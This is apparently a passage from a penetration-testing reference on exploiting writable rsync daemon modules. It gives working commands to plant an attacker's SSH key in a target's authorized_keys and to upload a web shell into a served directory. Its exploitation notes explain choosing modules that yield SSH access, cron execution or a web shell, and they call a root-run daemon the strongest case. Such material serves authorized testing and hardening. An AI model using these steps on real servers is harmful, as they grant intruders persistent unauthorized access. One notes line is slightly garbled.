A module without read only = yes accepts uploads. Where that module maps onto a sensitive path on the server (a home directory, cron directory, or web root), uploading the right file turns write access into execution: an authorized_keys for SSH, a job in cron.d, or a web shell under a served directory.
# Upload an SSH key to a writable home-directory module
echo 'ssh-ed25519 AAAA... attacker' > authorized_keys
rsync -av authorized_keys rsync://<target>/home/user/.ssh/authorized_keys
# Or drop a cron job / web shell where the module maps to one
rsync -av shell.php rsync://<target>/www/uploads/
Exploitation notes#
- The payoff depends on where the module points: a home dir enables SSH key injection,
cron.dscheduled execution, a web root a web shell. - The daemon's run user determines file ownership; a root-run rsyncd writing to system paths is the strongest case.
- Combine with Module enumeration to pick the module whose path yields execution.